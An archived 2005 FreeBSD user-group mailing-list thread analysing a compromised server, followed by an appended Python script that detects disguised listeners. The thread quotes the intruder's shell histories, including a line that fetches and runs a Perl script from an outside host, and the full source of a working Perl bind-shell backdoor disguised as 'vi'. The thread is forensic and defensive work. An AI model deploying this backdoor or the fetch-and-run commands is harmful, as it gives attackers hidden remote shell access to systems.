hacking ... shall we study it?

Dario Freni saturnero at gufi.org
Mon 28 Nov 2005 20:15:41 CET


Gianmarco Giovannelli wrote:
> 
> I received this message from **** about a compromised server :-)
> 
>>      2  21:09   cd .psybsd
>>      3  21:09   dir -la
>>      4  21:09   cat psybnc.conf
>>      5  21:10   rm -rf *
>>      6  21:10   cd ..
>>      7  21:10   cd ...
>>      8  21:10   ls
>>      9  21:10   cd psybnc
>>     10  21:10   ls
>>     11  21:10   export PATH="."
>>     12  21:10   ./swapper
>>     13  21:10   exit
>>     14  16:49   w
>>     15  16:49   ps -aux
>>     16  16:49   dir -la
>>     17  16:49   cd /var/tmp
>>     18  16:49   dir -la
>>     19  16:49   cd ...
>>     20  16:49   dir
>>     21  16:49   cd psybnc
>>     22  16:49   ls
>>     23  16:50   export
>>     24  16:50   swapper
>>     25  16:50   ps -aux
>>     26  16:50   exit
>>     27  16:54   cat /etc/passwd
>>     28  16:56   last
>>     29  16:59   last
>>     30  16:59   w
>>     31  16:59   ps -aux
>>     32  16:59   exit
>>     33  3:45    uname -a
>>     34  3:45    bash
>>     35  3:45    sh
>>     36  3:49    exit
>>     37  6:45    bash
>>     38  6:45    sh
>>     39  6:51    exit
>>     40  11:59   /usr/bin/perl
>>     41  11:59   ps x
>>     42  11:59   ls
>>     43  11:59   vi bds
>>     44  11:59   perl bds
>>     45  12:00   ps x
>>     46  12:00   kill -9 76439 43695
>>     47  12:00   ps x
>>     48  12:00   exit
>>     49  12:03   wget
>>     50  12:03   curl
>>     51  12:04   emacs
>>     52  12:04   gwget
>>     53  12:04   kget
>>     54  12:04   kget www.com.com/q/1
>>     55  12:05   kget www.com.com/q~./1
>>     56  12:05   kget www.com.com/q.1
>>     57  12:05   ls
>>     58  12:05   kget www.com.com/q.1 1
>>     59  12:05   touch 1
>>     60  12:05   kget www.com.com/q.1 1
>>     61  12:05   kget 1
>>     62  12:05   cat 1
>>     63  12:05   rm 1
>>     64  12:06   gmake
>>     65  12:06   fetch
>>     66  12:07   fetch www.com.com
>>     67  12:07   fetch http://slickland.com/rk/bds.txt -o b.txt
>>     68  12:07   ls
>>     69  12:08   head bds.txt
>>     70  12:08   rm bds.txt
>>     71  12:09   cd /tmp ; fetch http://slickland.com/rk/bds.txt ; mv bds.txt bds.pl ; chmod 777 bds.pl ; perl bds.pl
>>     72  12:09   ps x
>>     73  12:09   kill -9 77329
>>     74  12:10   cd ..
>>     75  12:10   cd /
>>     76  12:10   ls
>>     77  12:13   exit
>>     78  14:37   fetch slickland.com/xpl/bsdpass
>>     79  14:38   fetch http://www.slickland.com/xpl/bsdpass
>>     80  14:38   chmod +x bsdpass
>>     81  14:38   ./bsdpass
>>     82  14:38   rm bsdpass
>>     83  14:38   vi bsdpass.c
>>     84  14:38   gcc -o bsdpass bsdpass.c
>>     85  14:39   ./bsdpass
>>     86  14:40   ls
>>     87  14:40   cat kmem
>>     88  14:40   cat sendfile1
>>     89  14:40   rm sendfile1
>>     90  14:40   rm kmem
>>     91  14:40   rm bsdpass.c
>>     92  14:40   ls
>>     93  14:40   ftp ftp.slickland.com
>>     94  14:42   ftp ftp.slickland.com
>>     95  14:43   rm bsdpass
>>     96  14:43   ls
>>     97  14:43   exit
>>     98  23:48   history
>>     99  23:48   history > hackterra.log
>>    100  23:48   who
>>    101  23:50   history
>>
>> here is dbs.txt
>> #!/usr/bin/perl
>> $port = 4132;
>> $hide = "vi";
>> unlink($0); $0 = $hide . "\0" x16;
>> $SIG{'INT'}='IGNORE';$SIG{'HUP'}='IGNORE';$SIG{'TERM'}='IGNORE';
>> $SIG{'CHLD'}='IGNORE'; if(fork()){exit(0);};
>> use Socket; $proto = getprotobyname('tcp');
>> socket(SERVER,PF_INET,SOCK_STREAM,$proto);
>> setsockopt(SERVER,SOL_SOCKET,SO_REUSEADDR,pack("l",1));
>> bind(SERVER,sockaddr_in($port,INADDR_ANY));
>> if(listen(SERVER,SOMAXCONN)) { print("## BDS Started. Port $port\n"); } else { die "listen: $!" };
>> for(;$paddr = accept(CLIENT,SERVER);close CLIENT)
>> {
>>    open(STDIN,">&CLIENT");open(STDOUT,">&CLIENT");open(STDERR,">&CLIENT");
>>    print("## BDS backdoor by Slick\n\n");
>>    while(1)
>>    {
>>    print("[cmd]# ");
>>    if (fork() == 0) {
>>      $cmd=<STDIN>;
>>      chomp($cmd);
>>      exec($cmd);
>>      exit 0;
>>                     }
>>    wait;
>>    }
>>    close(STDIN);close(STDOUT);close(STDERR);
>> }

A simple backdoor: it opens a network service on port 4132, shows up as a 
"vi" process, and gives a shell to whoever connects.


>>
>> I'd like to see the bsdpass.c file

Analysing the bsdpass binary turns up a function called dolisten, calls to 
bind(), connect(), sendfile() (?) and a string like this:

/usr/bin/chsh -s /bin/sh

Another remote backdoor, I suppose.


> and here is the user info (pwd info, complete with a shell :-)
> 
>> here is what info did
>>
>>      2  22:15   cd
>>      3  22:15   w
>>      4  22:15   cd ..
>>      5  22:15   cd ..
>>      6  22:15   cd ..
>>      7  22:15   cd ..
>>      8  22:15   cd ..
>>      9  22:15   cd ..
>>     10  22:15   cd ..
>>     11  22:15   cd /
>>     12  22:15   cd
>>     13  22:15   cd //
>>     14  22:15   cd .
>>     15  22:16   cd usr
>>     16  22:16   var
>>     17  22:16   exit
>>     18  6:58    cd /var/tmp/" "
>>     19  6:58    cd .psybsd
>>     20  6:58    ./httpd
>>     21  6:59    cd
>>     22  6:59    w
>>     23  6:59    cd ..
>>     24  6:59    cd ..
>>     25  6:59    exit
>>     26  7:10    cd /var/tmp
>>     27  7:10    ls
>>     28  7:10    cd" "
>>     29  7:10    cd " "
>>     30  7:10    ls
>>     31  7:10    cd .psybsd
>>     32  7:10    ./http
>>     33  7:10    ./httpd
>>     34  7:10    cd
>>     35  7:10    cd ..
>>     36  7:10    cd ..
>>     37  7:10    cd ..
>>     38  7:10    cd ..
>>     39  7:10    w
>>     40  7:10    exit
>>     41  21:36   cd /var/tmp
>>     42  21:36   ls
>>     43  21:36   cd .``.``.
>>     44  21:36   cd '" "cd " "
>>     45  21:36   cd " "
>>     46  21:36   ls
>>     47  21:36   cd .psybsd
>>     48  21:36   ./httpd
>>     49  21:36   cd
>>     50  21:36   exit
>>     51  17:56   w
>>     52  17:56   cd /var/tmp
>>     53  17:56   ls
>>     54  17:56   cd " "
>>     55  17:56   ls
>>     56  17:56   cd .psybsd
>>     57  17:56   ls
>>     58  17:56   pic psybnc.conf
>>     59  17:57   ls
>>     60  17:57   pic menuconf
>>     61  17:58   pic psybnc.conf.old
>>     62  17:59   pic log
>>     63  18:05   uname -a
>>     64  18:05   uname -s
>>     65  18:05   w
>>     66  18:06   cd ..
>>     67  18:06   cd ..
>>     68  18:06   cd
>>     69  18:06   cd ..
>>     70  18:06   cd ..
>>     71  18:06   rm -rf .psybsd
>>     72  18:06   ls
>>     73  18:06   cd
>>     74  18:06   cd ..
>>     75  18:06   exit
>>     76  18:06   cd /var/tmp/" "
>>     77  18:07   rm -rf .psybsd
>>     78  18:07   ls
>>     79  18:07   ls -all
>>     80  18:07   ftp
>>     81  18:10   ps -x
>>     82  18:10   killall -9 10745
>>     83  18:11   cd .psybsd
>>     84  18:11   ls
>>     85  18:11   tar -xvzf psyBNC2.3.2-5.tar.gz
>>     86  18:11   rm -rf psyBNC*
>>     87  18:11   mv psybnc .psybsd
>>     88  18:12   cd .psybsd
>>     89  18:12   make
>>     90  18:14   mv psybnc sshd
>>     91  18:14   ls
>>     92  18:14   ps -x
>>     93  18:14   kill -9 10745
>>     94  18:16   ./sshd
>>     95  18:18   uname -a
>>     96  18:19   cat /etc/hosts
>>     97  18:20   cd
>>     98  18:20   cd ..
>>     99  18:20   cd ..
>>    100  18:20   exit
> 
> 
> 
> What do you think they were doing?

They were installing psybnc, an IRC bouncer. They renamed the binary to sshd 
so that nothing would look odd in ps (apart from the leading ./, lusers). It 
is a sort of IRC proxy used to stay anonymous on networks where your IP is 
publicly visible.

Cheers,
Dario

-- 
Dario Freni (saturnero at gufi.org)
Gruppo Utenti FreeBSD Italia (http://www.gufi.org)
GPG Public key at http://www.saturnero.net/saturnero.asc
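As an added example (not code from the thread), a Python check for the two tricks Dario points out: a listener whose argv[0] was rewritten (the backdoor's `$0 = "vi"`) and a daemon run under a borrowed name from /var/tmp (psybnc as ./sshd). It assumes sockstat's COMMAND column and `ps -o comm` both show the kernel's command name, which rewriting $0 does not change; the sample output is constructed.

```python
# Constructed samples (not captured from the host in the thread) in the layout of
# FreeBSD `sockstat -4l` and `ps -axo pid,comm,args`; psybnc was renamed "sshd".
SOCKSTAT_SAMPLE = """\
USER     COMMAND    PID   FD PROTO  LOCAL ADDRESS         FOREIGN ADDRESS
root     sshd       712   4  tcp4   *:22                  *:*
info     perl       8841  3  tcp4   *:4132                *:*
info     sshd       10745 6  tcp4   *:31337               *:*
www      httpd      650   3  tcp4   *:80                  *:*
"""
# The backdoor's kernel command name stays "perl"; only its argv was set to "vi".
PS_SAMPLE = """\
  PID COMMAND COMMAND
  712 sshd    /usr/sbin/sshd
 8841 perl    vi
10745 sshd    ./sshd
  650 httpd   /usr/local/sbin/httpd
"""
EXPECTED_PORT = {"sshd": 22, "httpd": 80}     # daemons with a well-known port
TEMP_PREFIXES = ("./", "/tmp/", "/var/tmp/")  # no real daemon is started from here

def parse_sockstat(text):  # pid -> (user, kernel command name, listening port)
    out = {}
    for f in (line.split() for line in text.splitlines()[1:]):
        if len(f) >= 6:
            out[int(f[2])] = (f[0], f[1], int(f[5].rsplit(":", 1)[1]))
    return out

def parse_ps(text):  # pid -> (kernel command name, argv[0])
    out = {}
    for f in (line.split() for line in text.splitlines()[1:]):
        if len(f) >= 3:
            out[int(f[0])] = (f[1], f[2])
    return out

def find_suspicious_listeners(sockstat_text, ps_text):
    """Return {pid: [reasons]} for listeners showing the tricks seen in the thread."""
    procs, findings = parse_ps(ps_text), {}
    for pid, (user, comm, port) in parse_sockstat(sockstat_text).items():
        reasons = []
        if comm in EXPECTED_PORT and port != EXPECTED_PORT[comm]:
            reasons.append(f"{comm} listening on {port}, expected {EXPECTED_PORT[comm]}")
        if pid in procs:
            kcomm, argv0 = procs[pid]
            if argv0.rsplit("/", 1)[-1] != kcomm:   # $0 = "vi" style name masquerade
                reasons.append(f"argv[0] {argv0!r} does not match kernel name {kcomm!r}")
            if argv0.startswith(TEMP_PREFIXES):     # psybnc run as ./sshd from /var/tmp
                reasons.append(f"started from {argv0!r}")
        if reasons:
            findings[pid] = reasons
    return findings
```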

